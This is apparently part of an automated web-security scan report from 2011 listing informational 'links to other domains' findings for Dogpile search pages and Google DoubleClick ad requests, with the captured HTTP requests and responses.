http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/dp-index.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/home_logo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true
http://www.addthis.com/bookmark.php?v=20
http://www.infospaceinc.com/about/
http://www.mercantila.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=bc343352182e410c9000c16a3af0cb01&ActionId=3155485be7cc4f26b720c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:15:57 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:57 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:55:57 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:55:56 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 32082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>

...[SNIP]...


<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true" />
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true" />

<style id="icePage_DocumentStyle_DocumentStyleBase_DynamicStyles" type="text/css">
...[SNIP]...
</style>
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true" />


<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/dp-index.css/_iceUrlFlag=15?_IceUrl=true" />



<link rel="icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="shortcut icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="search" type="application/opensearchdescription+xml" title="Dogpile.com" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml" />

</head>
...[SNIP]...
<a id="icePage_DPHeaderLogo_HeaderImageLink"><img id="icePage_DPHeaderLogo_DPLogo" title="Dogpile" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/home_logo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Dogpile. All the best search engines piled into one." style="border-width:0px;" /></a>
...[SNIP]...
</div>

<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
...[SNIP]...
</script>
<a id="icePage_FavoriteFetchesAd_QuickStartAddThis_AddThisLink" onclick="logClick(callback_server_url);return addthis_open(this, '', addthis_share_url , document.title)" href="http://www.addthis.com/bookmark.php?v=20">Bookmark and Share</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
<div>
<img width="710" height="292" border="0" usemap="#aprilfools" src="http://ttl30d.images.infospace.com.edgesuite.net/search/images/201103/Arfie_AprilFools2.gif">
<map name="aprilfools">
...[SNIP]...
</div>

<script type="text/javascript" language="JavaScript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...
<div class="inspFooterContent" id="inspFooterContent">
<a id="icePage_DPFooter_AboutImage" href="http://www.infospaceinc.com/about/"><img id="icePage_DPFooter_imgINSP" title="Infospace..." src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Infospace..." style="height:19px;width:74px;border-width:0px;" /></a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_About" href="http://www.infospaceinc.com/about/">About Infospace</a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_MercantilaLink" href="http://www.mercantila.com/">Mercantila</a>
...[SNIP]...

11.5. http://dogpile.com/dogpile/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dogpile.com
Path:	/dogpile/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11

Issue detail

The page was loaded from a URL containing a query string:

http://dogpile.com/dogpile/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11?_IceUrl=true

The response contains the following links to other domains:

http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico
http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true
http://www.infospaceinc.com/about/
http://www.mercantila.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Fri, 01 Apr 2011 16:55:30 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0ff17b4a4f38410788e3c16a3af0cb01&ActionId=77b317ce98ea4bf38978c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:15:30 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:30 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:55:30 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:55:29 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 50655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>

...[SNIP]...
<meta name="Keywords" content=" save searches, adult filter, languages"/>

<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true" />
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true" />

<style id="icePage_DocumentStyle_DynamicStyles" type="text/css">
...[SNIP]...
</style>
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true" />


<link rel="icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="shortcut icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="search" type="application/opensearchdescription+xml" title="Dogpile.com" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml" />

</head>
...[SNIP]...
<a id="icePage_DPHeaderLogo_HeaderImageLink" href="http://dogpile.com/dogpile/ws/index/_iceUrlFlag=11?_IceUrl=true"><img id="icePage_DPHeaderLogo_DPLogo" title="Dogpile" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Dogpile. All the best search engines piled into one." style="border-width:0px;" /></a>
...[SNIP]...
<div id="icePage_SearchBoxTop_ctl02" class="sbattrib">
<img id="icePage_SearchBoxTop_sbattribution" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true" alt="Search Providers" style="border-width:0px;" />
</div>
...[SNIP]...
<a onclick="toggleAdvSearch('icePage_SearchBoxTop_AdvSearchLinkRight_AdvLnkWrapper_AdvOptionLnk');">Close <img id="icePage_SearchBoxTop_AdvSearchCloseImage" title="Close" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true" alt="Close" style="border-width:0px;" /></a>
...[SNIP]...
</div>

<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
...[SNIP]...
<div id="icePage_SearchBoxBottom_ArfieImage" class="arfieImage">
               <img id="icePage_SearchBoxBottom_ArfieImageContent" Title="" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true" alt="Arfie" style="border-width:0px;" />
           </div>
...[SNIP]...
</div>

<script type="text/javascript" language="JavaScript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...
<div class="inspFooterContent" id="inspFooterContent">
<a id="icePage_DPFooter_AboutImage" href="http://www.infospaceinc.com/about/"><img id="icePage_DPFooter_imgINSP" title="Infospace..." src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Infospace..." style="height:19px;width:74px;border-width:0px;" /></a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_About" href="http://www.infospaceinc.com/about/">About Infospace</a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_MercantilaLink" href="http://www.mercantila.com/">Mercantila</a>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...

11.6. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7603215072684732&output=html&h=600&slotname=2626477342&w=120&lmt=1301695342&flash=10.2.154&url=http%3A%2F%2Fwww.mercantila.com%2F&dt=1301677342636&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301677342699&frm=0&adk=3335094675&ga_vid=789951021.1301677343&ga_sid=1301677343&ga_hid=1915206547&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1118&bih=961&fu=0&ifi=1&dtd=135&xpc=dJDzwNkAmU&p=http%3A//www.mercantila.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.mercantila.com/%26hl%3Den%26client%3Dca-pub-7603215072684732%26adU%3Dwww.thebeanbagstore.com%26adT%3DLoft%2BBeds%2BSale%26adU%3Dwww.glasspec.com%26adT%3DInmate%2Bfurniture%26adU%3Dwww.momsbunkhouse.com%26adT%3DBrowse%2BBunk%2BBeds%2Bat%2BMOM%2526%252339%253BS%26adU%3Dsavingmore.com%26adT%3DTwin%2BSleigh%2BBed%26gl%3DUS&usg=AFQjCNHALhR3E5XRVCf1tT7eMDOw4nKVsw

Request

GET /pagead/ads?client=ca-pub-7603215072684732&output=html&h=600&slotname=2626477342&w=120&lmt=1301695342&flash=10.2.154&url=http%3A%2F%2Fwww.mercantila.com%2F&dt=1301677342636&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301677342699&frm=0&adk=3335094675&ga_vid=789951021.1301677343&ga_sid=1301677343&ga_hid=1915206547&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1118&bih=961&fu=0&ifi=1&dtd=135&xpc=dJDzwNkAmU&p=http%3A//www.mercantila.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 01 Apr 2011 17:01:46 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 12645
X-XSS-Protection: 1; mode=block

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#457cb0;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.mercantila.com/%26hl%3Den%26client%3Dca-pub-7603215072684732%26adU%3Dwww.thebeanbagstore.com%26adT%3DLoft%2BBeds%2BSale%26adU%3Dwww.glasspec.com%26adT%3DInmate%2Bfurniture%26adU%3Dwww.momsbunkhouse.com%26adT%3DBrowse%2BBunk%2BBeds%2Bat%2BMOM%2526%252339%253BS%26adU%3Dsavingmore.com%26adT%3DTwin%2BSleigh%2BBed%26gl%3DUS&usg=AFQjCNHALhR3E5XRVCf1tT7eMDOw4nKVsw" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

11.7. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8825891582215045&output=html&h=90&slotname=7037596918&w=728&lmt=1301699500&flash=10.2.154&url=http%3A%2F%2Fwww.quickyellow.com%2F&dt=1301681500421&bpp=3&shv=r20110324&jsv=r20110321-2&prev_slotnames=8282812667%2C9743825372&correlator=1301681500450&frm=0&adk=3858373606&ga_vid=1234146098.1301681501&ga_sid=1301681501&ga_hid=936317177&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1118&bih=1004&fu=0&ifi=3&dtd=157&xpc=IiKJhNr6EE&p=http%3A//www.quickyellow.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.quickyellow.com/%26hl%3Den%26client%3Dca-pub-8825891582215045%26adU%3DYellowbook.com%26adT%3DLocal%2BYellow%2BPages%26adU%3Dyellowpages.com%26adT%3DYELLOWPAGES.COM%26adU%3Dwww.hoovers.com/company_directory%26adT%3DBusiness%2BDirectories%26gl%3DUS&usg=AFQjCNH3Tb30QEk-n_AwVdhdZVFq2G4tbg

Request

GET /pagead/ads?client=ca-pub-8825891582215045&output=html&h=90&slotname=7037596918&w=728&lmt=1301699500&flash=10.2.154&url=http%3A%2F%2Fwww.quickyellow.com%2F&dt=1301681500421&bpp=3&shv=r20110324&jsv=r20110321-2&prev_slotnames=8282812667%2C9743825372&correlator=1301681500450&frm=0&adk=3858373606&ga_vid=1234146098.1301681501&ga_sid=1301681501&ga_hid=936317177&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1118&bih=1004&fu=0&ifi=3&dtd=157&xpc=IiKJhNr6EE&p=http%3A//www.quickyellow.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 01 Apr 2011 18:11:03 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 12262
X-XSS-Protection: 1; mode=block

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#023cbb;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.quickyellow.com/%26hl%3Den%26client%3Dca-pub-8825891582215045%26adU%3DYellowbook.com%26adT%3DLocal%2BYellow%2BPages%26adU%3Dyellowpages.com%26adT%3DYELLOWPAGES.COM%26adU%3Dwww.hoovers.com/company_directory%26adT%3DBusiness%2BDirectories%26gl%3DUS&usg=AFQjCNH3Tb30QEk-n_AwVdhdZVFq2G4tbg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

11.8. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8825891582215045&output=html&h=90&slotname=8282812667&w=728&lmt=1301699500&flash=10.2.154&url=http%3A%2F%2Fwww.quickyellow.com%2F&dt=1301681500410&bpp=4&shv=r20110324&jsv=r20110321-2&correlator=1301681500450&frm=0&adk=3919608833&ga_vid=1234146098.1301681501&ga_sid=1301681501&ga_hid=936317177&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1118&bih=1004&fu=0&ifi=1&dtd=132&xpc=sWVWMDRxeO&p=http%3A//www.quickyellow.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.quickyellow.com/%26hl%3Den%26client%3Dca-pub-8825891582215045%26adU%3Dwww.OHalloranAgency.com%26adT%3DYellow%2BPages%2BAd%2BAgency%26adU%3Dprweb.com%26adT%3DAdvertise%2BYour%2BBusiness%26adU%3Dwww.Google.com/AdWords%26adT%3DGet%2B%252475%2BFree%2BAdvertising%26gl%3DUS&usg=AFQjCNE1b3ZNsmgdBpqSOvK93e8vbyChlQ

Request

GET /pagead/ads?client=ca-pub-8825891582215045&output=html&h=90&slotname=8282812667&w=728&lmt=1301699500&flash=10.2.154&url=http%3A%2F%2Fwww.quickyellow.com%2F&dt=1301681500410&bpp=4&shv=r20110324&jsv=r20110321-2&correlator=1301681500450&frm=0&adk=3919608833&ga_vid=1234146098.1301681501&ga_sid=1301681501&ga_hid=936317177&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1118&bih=1004&fu=0&ifi=1&dtd=132&xpc=sWVWMDRxeO&p=http%3A//www.quickyellow.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 01 Apr 2011 18:11:03 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 12173
X-XSS-Protection: 1; mode=block

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#023cbb;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.quickyellow.com/%26hl%3Den%26client%3Dca-pub-8825891582215045%26adU%3Dwww.OHalloranAgency.com%26adT%3DYellow%2BPages%2BAd%2BAgency%26adU%3Dprweb.com%26adT%3DAdvertise%2BYour%2BBusiness%26adU%3Dwww.Google.com/AdWords%26adT%3DGet%2B%252475%2BFree%2BAdvertising%26gl%3DUS&usg=AFQjCNE1b3ZNsmgdBpqSOvK93e8vbyChlQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

11.9. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7603215072684732&output=html&h=90&slotname=7539052272&w=728&lmt=1301695343&flash=10.2.154&url=http%3A%2F%2Fwww.mercantila.com%2F&dt=1301677343860&bpp=2&shv=r20110324&jsv=r20110321-2&prev_slotnames=2626477342&correlator=1301677342699&frm=0&adk=1973868674&ga_vid=789951021.1301677343&ga_sid=1301677343&ga_hid=1915206547&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1118&bih=961&fu=0&ifi=2&dtd=12&xpc=KUiBBGitGB&p=http%3A//www.mercantila.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
